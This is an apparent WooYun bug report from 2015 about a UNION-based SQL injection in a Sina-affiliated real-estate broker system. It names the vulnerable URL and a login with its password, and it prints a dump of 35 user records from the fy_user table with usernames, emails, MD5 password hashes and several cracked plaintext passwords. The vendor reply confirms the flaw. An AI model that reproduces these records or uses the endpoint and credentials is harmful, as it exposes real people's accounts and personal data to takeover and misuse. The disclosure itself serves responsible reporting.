当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105649

漏洞标题:新浪某系统存在高危SQL注入漏洞四(支持UNION)

相关厂商:新浪

漏洞作者: HackBraid

提交时间:2015-04-06 19:07

修复时间:2015-05-22 10:38

公开时间:2015-05-22 10:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-06: 细节已通知厂商并且等待厂商处理中
2015-04-07: 厂商已经确认,细节仅向厂商公开
2015-04-17: 细节向核心白帽子及相关领域专家公开
2015-04-27: 细节向普通白帽子公开
2015-05-07: 细节向实习白帽子公开
2015-05-22: 细节向公众公开

简要描述:

RT

详细说明:

UNION可跨20+的数据库,给个20rank要求不高吧?
http://broker2.esf.leju.com/todayusestat/port?agentid=8116554 lj_shop543 123456登录后抓包,支持UNION

漏洞证明:

1.png


看到db_fangyou ,看看影响力,百万级的用户信息泄露

22.png


用户名、密码信息都有了~

Database: db_fangyou
Table: fy_user
[35 entries]
+--------+--------+--------+----------+----------+---------------+------------------+------------+---------------------+---------------------+-------+--------+--------+---------+--------------------------+----------+----------+---------------------------------------------+---------------------+---------------------+-------------+--------------+--------------+--------------+-----------------+
| uid    | cuid   | uuid   | appr_uid | root_uid | bargain_baidu | isbaidumoderator | role       | cdate               | udate               | enter | status | be_cxt | from400 | username                 | citycode | fromtype | password                                    | appr_date           | last_login          | total_point | profile_edit | bargain_sina | total_clicks | issinamoderator |
+--------+--------+--------+----------+----------+---------------+------------------+------------+---------------------+---------------------+-------+--------+--------+---------+--------------------------+----------+----------+---------------------------------------------+---------------------+---------------------+-------------+--------------+--------------+--------------+-----------------+
| 525717 | 311865 | 0      | NULL     | 264717   | 1             | 0                | agent      | 2010-09-20 08:52:50 | 2012-10-16 02:59:38 | NULL  | 0      | 3      | 0       | [email protected]       | bj       | 0        | 73b39125241ae0fb904f8de20f14ac70            | NULL                | 2010-10-28 17:50:34 | 480         | 0            | 1            | 9            | 0               |
| 525716 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:51:22 | 2010-09-20 08:51:22 | NULL  | 0      | 0      | 0       | [email protected]          | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525715 | 0      | 0      | 525715   | 0        | 1             | 0                | agent      | 2010-09-20 08:50:49 | 2012-05-30 13:56:08 | NULL  | 0      | 3      | 0       | zhuguang112233           | bj       | 2        | 8527de5872c58cfdc57bb222c670b454            | 2011-04-26 21:10:23 | 2010-11-11 13:33:43 | 2450        | 0            | 1            | 17           | 0               |
| 525714 | 0      | 0      | NULL     | 0        | 1             | 0                | agent      | 2010-09-20 08:50:04 | 2015-04-02 23:10:02 | NULL  | 3      | 3      | 0       | wayen1980                | sy       | 1        | 6c2e018a8171e7bb178a5201289ff04d            | NULL                | 2011-01-23 16:44:56 | 9860        | 0            | 1            | 3434         | 0               |
| 526932 | 310019 | 0      | 526932   | 259275   | 1             | 0                | agent      | 2010-09-21 08:46:14 | 2012-10-16 03:01:30 | NULL  | 0      | 3      | 0       | [email protected]      | bj       | 0        | e10adc3949ba59abbe56e057f20f883e (123456)   | 2010-09-21 21:15:02 | 2010-09-23 15:30:32 | 310         | 0            | 1            | 7            | 0               |
| 525713 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:48:52 | 2010-09-20 08:48:52 | NULL  | 0      | 0      | 0       | mulingxia                | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525712 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:48:34 | 2010-09-20 08:48:34 | NULL  | 3      | 0      | 0       | [email protected]            | bj       | 2        | 1bbd886460827015e5d605ed44252251 (11111111) | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525711 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:48:21 | 2011-01-07 18:07:45 | NULL  | 0      | 0      | 0       | 525711                   | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525710 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:47:19 | 2010-09-20 08:47:19 | NULL  | 0      | 0      | 0       | limin88168               | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525775 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 09:36:35 | 2010-09-20 09:36:35 | NULL  | 3      | 0      | 0       | [email protected]        | bj       | 1        | ebe7bb949457e7448661666aa96daf85            | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525709 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:46:15 | 2010-09-20 08:46:15 | NULL  | 0      | 0      | 0       | xiaomei1011              | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525708 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:45:00 | 2010-09-20 08:45:00 | NULL  | 0      | 0      | 0       | [email protected]       | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525707 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:43:31 | 2010-09-20 08:43:31 | NULL  | 0      | 0      | 0       | [email protected]        | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525706 | 0      | 0      | NULL     | NULL     | 1             | 0                | agent      | 2010-09-20 08:43:14 | 2012-05-30 13:56:08 | NULL  | 0      | 0      | 0       | yujunxiaolan             | bj       | 2        | 723d505516e0c197e42a6be3c0af910e (5201314)  | NULL                | 2010-09-20 08:43:35 | 10          | 0            | 1            | 4            | 0               |
| 527436 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-21 14:11:52 | 2010-09-21 14:11:52 | NULL  | 0      | 0      | 0       | qdsh2008_vip             | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525704 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:34:56 | 2010-09-20 08:34:56 | NULL  | 0      | 0      | 0       | [email protected]       | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525703 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:34:41 | 2010-09-20 08:34:41 | NULL  | 0      | 0      | 0       | hljgxj_eb1aj             | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 530340 | 530333 | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-24 22:25:01 | 2011-01-07 17:11:16 | NULL  | 0      | 0      | 0       | 530340                   | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525702 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:33:51 | 2010-09-20 08:33:51 | NULL  | 3      | 0      | 0       | [email protected]      | bj       | 1        | e10adc3949ba59abbe56e057f20f883e (123456)   | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525700 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:28:06 | 2010-09-20 08:28:06 | NULL  | 0      | 0      | 0       | [email protected]        | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525699 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:27:22 | 2011-01-07 18:07:44 | NULL  | 0      | 0      | 0       | 525699                   | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525698 | 0      | 446    | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:25:57 | 2015-02-25 11:16:44 | NULL  | 3      | 0      | 0       | [email protected]           | bj       | 1        | e10adc3949ba59abbe56e057f20f883e (123456)   | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525697 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:21:42 | 2011-01-07 17:13:27 | NULL  | 0      | 0      | 0       | 525697                   | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 527425 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-21 14:03:54 | 2010-09-21 14:03:54 | NULL  | 3      | 0      | 0       | [email protected] | tj       | 1        | 624aab438f34c693aa8c2e8f7ca4385c            | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 528867 | 313646 | 528867 | NULL     | 8076967  | 1             | 0                | agent      | 2010-09-23 14:31:58 | 2015-02-03 15:25:36 | NULL  | 3      | 3      | 0       | [email protected]      | bj       | 1        | e10adc3949ba59abbe56e057f20f883e (123456)   | NULL                | 2010-09-23 14:33:35 | 2000        | 0            | 1            | 3            | 0               |
| 525695 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:13:31 | 2010-09-20 08:13:31 | NULL  | 3      | 0      | 0       | [email protected]          | bj       | 1        | e737a9aa08ac17a37ccbdd1cdbd5c930 (081000)   | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525694 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:12:47 | 2010-09-20 08:12:47 | NULL  | 0      | 0      | 0       | nick=yangguangfengyu7722 | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525693 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:12:14 | 2010-09-20 08:12:14 | NULL  | 0      | 0      | 0       | manger4713_              | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525692 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:03:29 | 2010-09-20 08:03:29 | NULL  | 3      | 0      | 0       | [email protected]         | bj       | 1        | 931810435ac7336be1da4f785797e14b (214214)   | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525690 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 07:49:14 | 2010-09-20 07:49:14 | NULL  | 0      | 0      | 0       | huangyang1012761         | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525689 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 07:43:32 | 2010-09-20 07:43:32 | NULL  | 0      | 0      | 0       | 15513276277              | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525691 | 257539 | 257539 | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 07:58:06 | 2010-09-20 07:58:06 | NULL  | 0      | 0      | 0       | 北京boy_0308               | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525688 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 07:06:38 | 2010-09-20 07:06:38 | NULL  | 0      | 0      | 0       | clfc                     | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525687 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 06:43:21 | 2010-09-20 06:43:21 | NULL  | 0      | 0      | 0       | luochengyu               | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525684 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 05:05:39 | 2010-09-20 05:05:39 | NULL  | 0      | 0      | 0       | lyle09                   | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
+--------+--------+--------+----------+----------+---------------+------------------+------------+---------------------+---------------------+-------+--------+--------+---------+--------------------------+----------+----------+---------------------------------------------+---------------------+---------------------+-------------+--------------+--------------+--------------+-----------------+

修复方案:

这么多账户,给个20把

版权声明:转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-04-07 10:36

厂商回复:

感谢支持,属于第三方合作业务漏洞,已经交给其进行处理

最新状态:

暂无